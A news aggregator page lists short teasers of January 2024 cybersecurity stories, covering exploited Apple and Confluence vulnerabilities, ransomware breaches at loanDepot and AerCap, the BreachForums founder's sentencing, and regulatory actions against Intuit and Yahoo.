Source: www.bleepingcomputer.com – Author: Sergiu Gatlan. Today, the U.S. Federal Trade Commission (FTC) ordered Intuit to stop promoting its software products and services as “free” unless they’re actually free for all consumers. The order comes after the consumer protection watchdog’s investigation into how Intuit promoted its tax preparation software TurboTax as being a “free” product […] The post FTC orders Intuit to stop pushing “free” software that isn’t really free – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Bill Toulas. Security researchers looking at more than 10,000 scripts used by the Parrot traffic direction system (TDS) noticed an evolution marked by optimizations that make malicious code stealthier against security mechanisms. Parrot TDS was discovered by cybersecurity company Avast in April 2022 and it is believed to have been active since […] The post Malicious web redirect scripts stealth up to hide on hacked sites – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Sergiu Gatlan. Apple released security updates to address this year’s first zero-day vulnerability exploited in attacks that could impact iPhones, Macs, and Apple TVs. The zero-day fixed today is tracked as CVE-2024-23222 [iOS, macOS, tvOS] and is a WebKit type confusion issue that attackers could exploit to gain code execution on targeted […] The post Apple fixes first zero-day bug exploited in attacks this year – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Sergiu Gatlan. Ivanti warned admins to stop pushing new device configurations to appliances after applying mitigations because this will leave them vulnerable to ongoing attacks exploiting two zero-day vulnerabilities. While the company didn’t provide additional details, it said that this is caused by a known race condition when pushing configurations that […] The post Ivanti: VPN appliances vulnerable if pushing configs after mitigation – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Sergiu Gatlan. Mortgage lender loanDepot says that approximately 16.6 million people had their personal information stolen in a ransomware attack disclosed earlier this month. Following a January 6 attack that forced it to shut down some of its systems to contain the breach, the company told customers that recurring automatic payments […] The post loanDepot cyberattack causes data breach for 16.6 million people – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Bill Toulas. Trezor issued a security alert after identifying a data breach that occurred on January 17 due to unauthorized access to its third-party support ticketing portal. The popular hardware cryptocurrency wallet vendor says that the investigation into the incident is ongoing but it has found no evidence so far that users’ digital assets were […] The post Trezor support site breach exposes personal data of 66,000 customers – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Bill Toulas. Security researchers are observing exploitation attempts for the CVE-2023-22527 remote code execution vulnerability that affects outdated versions of Atlassian Confluence servers. Atlassian disclosed the security issue last week and noted that it impacts only Confluence versions released before December 5, 2023, along with some out-of-support releases. The flaw has a critical severity […] The post Hackers start exploiting critical Atlassian Confluence RCE flaw – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: socprime.com – Author: Veronika Telychko. Just over a week after the UAC-0050 group’s attack against Ukraine leveraging Remcos RAT, Quasar RAT, and Remote Utilities, the adversaries have reemerged in the cyber threat arena. CERT-UA has recently notified defenders of the group’s ongoing campaign involving mass email distribution and masquerading the senders as the State Service of […] The post UAC-0050 Activity Detection: Hackers Impersonate SSSCIP and State Emergency Service of Ukraine Using Remote Utilities – Source: socprime.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Ryan Naraine. Apple pushes out fresh versions of its iOS and macOS platforms to fix WebKit vulnerabilities being exploited as zero-days in the wild. The post Apple Ships iOS 17.3, Warns of WebKit Zero-Day Exploitation appeared first on SecurityWeek. Original Post URL: https://www.securityweek.com/apple-ships-ios-17-3-warns-of-webkit-zero-day-exploitation/ Category & Tags: Malware & Threats,Vulnerabilities,iOS 17.3,macOS Sonoma,WebKit,Zero-Day […] The post Apple Ships iOS 17.3, Warns of WebKit Zero-Day Exploitation – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Ryan Naraine. SecurityWeek interviews a wide spectrum of security experts on AI-driven cybersecurity use cases that are worth immediate attention. The post Security Experts Describe AI Technologies They Want to See appeared first on SecurityWeek. Original Post URL: https://www.securityweek.com/security-experts-describe-ai-technologies-they-want-to-see/ Category & Tags: Artificial Intelligence,Management & Strategy,artificial intelligence,ChatGPT,LLMs,venture capital […] The post Security Experts Describe AI Technologies They Want to See – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Eduard Kovacs. The Atlassian Confluence vulnerability CVE-2023-22527 is being exploited in the wild just days after it was disclosed. The post Hackers Targeting Critical Atlassian Confluence Vulnerability Days After Disclosure appeared first on SecurityWeek. Original Post URL: https://www.securityweek.com/hackers-start-targeting-critical-atlassian-confluence-vulnerability-days-after-disclosure/ Category & Tags: Vulnerabilities,Atlassian,Confluence,exploited,Featured,vulnerability The post Hackers Targeting Critical Atlassian Confluence Vulnerability Days After Disclosure – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: SecurityWeek News. Lending giant LoanDepot (NYSE: LDI) said that roughly 16.6 million individuals were impacted as a result of a ransomware attack. The post LoanDepot Breach: 16.6 Million People Impacted appeared first on SecurityWeek. Original Post URL: https://www.securityweek.com/loandepot-breach-16-6-million-people-impacted/ Category & Tags: Data Breaches,data breach,LoanDepot The post LoanDepot Breach: 16.6 Million People Impacted – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Eduard Kovacs. Varonis finds one vulnerability and three attack methods that can be used to obtain NTLM hashes via Outlook and two Windows programs. The post New NTLM Hash Leak Attacks Target Outlook, Windows Programs appeared first on SecurityWeek. Original Post URL: https://www.securityweek.com/new-ntlm-hash-leak-attacks-target-outlook-windows-programs/ Category & Tags: Identity & Access,Vulnerabilities,Microsoft Outlook,NTLM,vulnerabilities […] The post New NTLM Hash Leak Attacks Target Outlook, Windows Programs – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Ionut Arghire. Conor Brian Fitzpatrick, the owner of the cybercrime website BreachForums, was sentenced to time served and supervised release. The post Owner of Cybercrime Website BreachForums Sentenced to Supervised Release appeared first on SecurityWeek. Original Post URL: https://www.securityweek.com/owner-of-cybercrime-website-breachforums-sentenced-to-supervised-release/ Category & Tags: Cybercrime,BreachForums,sentenced The post Owner of Cybercrime Website BreachForums Sentenced to Supervised Release – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Ionut Arghire. CVE-2023-34048, a vCenter Server vulnerability patched in October 2023, had been exploited as a zero-day for a year and a half. The post Chinese Spies Exploited VMware vCenter Server Vulnerability Since 2021 appeared first on SecurityWeek. Original Post URL: https://www.securityweek.com/chinese-spies-exploited-vmware-vcenter-server-vulnerability-since-2021/ Category & Tags: Nation-State,Vulnerabilities,China,China APT,exploited,VMware The post Chinese Spies Exploited VMware vCenter Server Vulnerability Since 2021 – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: AFP. France’s data protection watchdog fines Yahoo 10 million euros for not respecting users’ refusals of internet-tracking “cookies”. The post France Fines Yahoo 10 Mn Euros Over Cookie Abuses appeared first on SecurityWeek. Original Post URL: https://www.securityweek.com/france-fines-yahoo-10-mn-euros-over-cookie-abuses/ Category & Tags: Privacy,cookies,fine,privacy,Yahoo The post France Fines Yahoo 10 Mn Euros Over Cookie Abuses – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.schneier.com – Author: Bruce Schneier. Comments: Tom • January 22, 2024 8:12 AM: Something I’ve been expecting to see for a while now is LLM chatbots asking questions on sites like reddit and stack overflow so that the answers can be used to further train the model. But how would we know it […] The post AI Bots on X (Twitter) – Source: www.schneier.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.darkreading.com – Author: PRESS RELEASE. SANTA CLARA, Calif., Jan. 22, 2024 /PRNewswire/ — Infoblox Inc., a leader in cloud networking and security services, today announces the appointment of Amy Farrow as Senior Vice President and Chief Information Officer. Infoblox leads the charge to unite networking and security to deliver improved performance and protection as the company continues to innovate […] The post Amy Farrow Joins Infoblox As Chief Information Officer – Source: www.darkreading.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.techrepublic.com – Author: Franklin Okeke. Looking for LastPass alternatives? Check out our list of the top password managers that offer secure and […] The post Top 6 LastPass Alternatives and Competitors for 2024 – Source: www.techrepublic.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Team Register. Australia’s government has used the “significant cyber incidents” sanctions regime it introduced in 2021 for the first time, against a Russian named Aleksandr Gennadievich Ermakov whom authorities have deemed responsible for the 2022 attack on health insurer Medibank Private. The 2022 incident saw Medibank attacked by ransomware, and data […] The post Australia imposes cyber sanctions on Russian it says ransomwared health insurer – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Team Register. More than 600 IP addresses are launching thousands of exploit attempts against CVE-2023-22527 – a critical bug in out-of-date versions of Atlassian Confluence Data Center and Server – according to non-profit security org Shadowserver. Atlassian disclosed the flaw, a template injection flaw that can allow unauthenticated remote code execution […] The post Atlassian Confluence Server RCE attacks underway from 600+ IPs – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Team Register. AerCap, the world’s largest aircraft leasing company, has reported a ransomware infection that occurred earlier this month, but claims it hasn’t yet suffered any financial losses and all its systems are under control. In a US Securities and Exchange Commission (SEC) filing on Monday, the aerospace giant said […] The post Slug slimes aerospace biz AerCap with ransomware, brags about 1TB theft – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Team Register. For a country that prides itself on being free, America does seem to have an awful lot of spying going on, as the new Street Surveillance Hub from the Electronic Frontier Foundation shows. The Hub contains detailed breakdowns of the types of surveillance systems used, from bodycams to biometrics, […] The post EFF adds Street Surveillance Hub so Americans can check who’s checking on them – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Team Register. Critics are accusing major tech companies of not sticking to the rules when it comes to registering vulnerabilities with the appropriate authorities. Both Juniper Networks and Ivanti have attracted criticism from members of the infosec industry for the way they’ve handled the disclosure of vulnerabilities over the past week. […] The post Ivanti and Juniper Networks accused of bending the rules with CVE assignments – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Team Register. The LockBit ransomware gang is claiming an attack on submarine sandwich slinger Subway, alleging it has made off with a platter of data. LockBit’s post to its leak blog, published on January 21, suggests one of its affiliates breached Subway’s database, stealing sensitive data on “all financial aspects” of […] The post Subway’s data torpedoed by LockBit, ransomware gang claims – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: thehackernews.com – Author: . Jan 23, 2024 (Newsroom, Cyber Crime / Dark Web). Conor Brian Fitzpatrick has been sentenced to time served and 20 years of supervised release for his role as the creator and administrator of BreachForums. Fitzpatrick, who went by the online alias “pompompurin,” was arrested in March 2023 in New York and was […] The post BreachForums Founder Sentenced to 20 Years of Supervised Release, No Jail Time – Source: thehackernews.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: thehackernews.com – Author: . Jan 23, 2024 (Newsroom, Vulnerability / Cyber Attack). Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure. Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers […] The post ~40,000 Attacks in 3 Days: Critical Confluence RCE Under Active Exploitation – Source: thehackernews.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: thehackernews.com – Author: . Jan 23, 2024 (Newsroom, Vulnerability / Device Security). Apple on Monday released security updates for iOS, iPadOS, macOS, tvOS, and the Safari web browser to address a zero-day flaw that has come under active exploitation in the wild. The issue, tracked as CVE-2024-23222, is a type confusion bug in the WebKit browser engine […] The post Apple Issues Patch for Critical Zero-Day in iPhones, Macs – Update Now – Source: thehackernews.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.